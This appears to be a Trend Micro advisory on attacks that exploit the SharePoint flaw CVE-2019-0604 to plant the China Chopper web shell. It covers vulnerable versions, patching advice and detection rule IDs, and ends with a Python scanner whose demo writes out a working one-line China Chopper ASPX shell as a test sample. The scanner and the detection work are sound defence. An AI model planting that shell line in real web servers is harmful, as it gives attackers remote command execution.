Trend Micro is aware of a campaign that is targeting several unpatched versions of Microsoft SharePoint Server in an attempt to deploy the China Chopper web shell.
It is believed that the campaign is leveraging CVE-2019-0604, a vulnerability originally discovered and disclosed to Microsoft by Markus Wulftange (@mwulftange) working with Trend Micro's Zero Day Initiative. Successful exploitation allows an attacker to run arbitrary code in the context of the SharePoint application pool and server farm account, which is how the web shell is deployed.
Microsoft released updates and security guidance for vulnerable versions of SharePoint in February and March of 2019; however, many servers remain unpatched.
Vulnerable Versions of Microsoft SharePoint
The following unpatched versions of Microsoft SharePoint are vulnerable:
- Microsoft SharePoint Server 2019
- Microsoft SharePoint Enterprise Server 2016
- Microsoft SharePoint Foundation 2013 SP1
- Microsoft SharePoint Server 2010 SP2
Mitigation and Protection
The first line of protection against any exploited vulnerability is to ensure that the affected systems are patched with Microsoft's latest security update. In addition, any SharePoint servers designated for corporate intranet or internal use should be sufficiently isolated from the outside Internet.
Trend Micro Detection and Protection
In addition to applying Microsoft's Security Update, Trend Micro provides additional rules and filters to complement the patch or to help mitigate some risk before affected servers are patched.
Trend Micro Deep Security
- Rule 1009535 - Microsoft SharePoint Remote Code Execution Vulnerability (CVE-2019-0604)
- Rule 1007170 - Identified Suspicious China Chopper Webshell Communication
Trend Micro TippingPoint ThreatDV
- Filter 33692: Microsoft SharePoint EntityInstanceEncoder Insecure Deserialization Vulnerability
- Filter 34152: HTTP: China Chopper PHP Webshell Traffic Detected (My Script RunInBrowser Control Command)
- Filter 34153: HTTP: China Chopper PHP Webshell Traffic Detected (Control Commands)
- Filter 34154: HTTP: China Chopper ASP Webshell Traffic Detected (Control Commands)
- Filter 34257: HTTP: China Chopper ASPX Webshell Traffic Detected (Control Commands)
Trend Micro Deep Discovery Inspector (DDI)
- Rule 2063: CHOPPER - HTTP (Request)
Trend Micro Malware Detection
- Official Pattern Release 15.111.00: contains detection for some known IOCs as Backdoor.ASP.CHOPSHELL.A and a client component executable as BKDR_CHOPPER.B.
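The network and pattern rules above detect China Chopper traffic and known samples; as an added host-side check (example code written for this note, not Trend Micro's rule logic or detection engine), the script below walks a SharePoint web root and flags server-side pages that carry the China Chopper ASPX hallmark, an eval() of a request parameter with the "unsafe" flag. The regexes, the file extensions scanned and the two sample pages are assumptions constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# Heuristics for the China Chopper ASPX shell, which is a one-line JScript
# page that evals a request parameter with the "unsafe" flag. These are
# defender-side assumptions for illustration, not Trend Micro's rule logic.
PATTERNS = {
    "chopper_eval": re.compile(r'eval\s*\(\s*Request(\.Item|\.Form|\.Params)?\s*\[', re.I),
    "unsafe_eval": re.compile(r'eval\s*\([^)]*,\s*"unsafe"\s*\)', re.I),
    "jscript_page": re.compile(r'<%@\s*Page\s+Language\s*=\s*"Jscript"', re.I),
}
STRONG = {"chopper_eval", "unsafe_eval"}   # one of these is enough to report
EXTENSIONS = {".aspx", ".asmx", ".ashx"}   # server-side pages IIS will execute

def scan_text(text):
    """Return the names of the indicators present in one page's source."""
    return [name for name, rx in PATTERNS.items() if rx.search(text)]

def scan_tree(root):
    """Walk a web root (e.g. a SharePoint LAYOUTS or virtual directory) and
    return (path, indicators) for every page carrying a strong indicator."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in EXTENSIONS:
            continue
        hits = scan_text(path.read_text(errors="ignore"))
        if STRONG & set(hits):
            findings.append((str(path), hits))
    return findings

# Constructed samples: a minimal chopper-style page and a benign layouts page.
CHOPPER = '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>'
BENIGN = ('<%@ Page Language="C#" Inherits="Microsoft.SharePoint.WebControls.'
          'LayoutsPageBase" %><html><body>Hello</body></html>')

def demo():
    """Create a throwaway web root holding the samples above and scan it."""
    root = Path(tempfile.mkdtemp())
    (root / "_layouts").mkdir()
    (root / "_layouts" / "default.aspx").write_text(BENIGN)
    (root / "_layouts" / "payload.aspx").write_text(CHOPPER)
    return scan_tree(root)

if __name__ == "__main__":
    for path, hits in demo():
        print(f"SUSPECT {path}: {', '.join(hits)}")
```

On a real farm, point scan_tree at each web application's virtual directory and the TEMPLATE\LAYOUTS tree, and treat any hit as a trigger for the incident response steps already underway, not as proof on its own.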
- Trend Micro Zero Day Initiative (ZDI) Blog Article: https://www.zerodayinitiative.com/blog/2019/3/13/cve-2019-0604-details-of-a-microsoft-sharepoint-rce-vulnerability
- Trend Micro Malware Report: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/Backdoor.ASP.CHOPSHELL.A
- Microsoft Advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604
- MITRE CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0604
- Canadian Centre for Cyber Security Alert AL19-006: https://cyber.gc.ca/en/alerts/china-chopper-malware-affecting-sharepoint-servers
Trend Micro will continue to monitor this threat and will provide updates as necessary.